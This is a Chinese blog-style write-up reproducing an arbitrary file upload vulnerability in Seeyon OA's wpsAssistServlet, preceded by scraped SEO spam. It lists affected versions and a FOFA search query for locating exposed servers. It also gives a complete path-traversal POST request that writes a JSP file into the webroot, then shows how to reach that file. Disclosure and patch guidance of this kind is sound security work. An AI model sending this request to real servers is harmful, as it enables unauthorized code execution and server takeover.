付费网站怎么破解,定州新闻今天重大新闻,网站建设公司 跨界鱼科技优,用本机做网站浏览文章目录 致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC]
0x01 前言
免责声明#xff1a;请勿利用… 文章目录 致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC]
0x01 前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用
0x02 漏洞描述
致远互联oa办公自动化软件系统,实现企业审批/报销/门户/公文/文档/采购/费用等综合管理,致远互联oa办公自动化软件系统,满足企业一体化办公需求。
致远OA wpsAssistServlet接口存在任意文件上传漏洞攻击者通过漏洞可以发送特定的请求包上传恶意文件获取服务器权限。
0x03 影响版本
致远OA A6、A8、A8N (V8.0SP2V8.1V8.1SP1)
致远OA G6、G6N (V8.1、V8.1SP1)0x04 漏洞环境
FOFA语法app“致远互联-OA” title“V8.0SP2”
0x05 漏洞复现
1.访问漏洞环境 2.构造POC
POC POST
POST /seeyon/wpsAssistServlet?flagsaverealFileType../../../../ApacheJetspeed/webapps/ROOT/seeyonlog.jspfileId2 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 217
Content-Type: multipart/form-data; boundarya4d7586ac9d50625dee11e86fa69bc71--a4d7586ac9d50625dee11e86fa69bc71
Content-Disposition: form-data; nameupload; filename123.xls
Content-Type: application/vnd.ms-excel% out.println(12345678);%
--a4d7586ac9d50625dee11e86fa69bc71--3.复现
拼接上传的文件路径https://127.0.0.1/seeyonlog.jsp
0x06 修复建议
致远OA已发布安全更新建议升级至最新版本。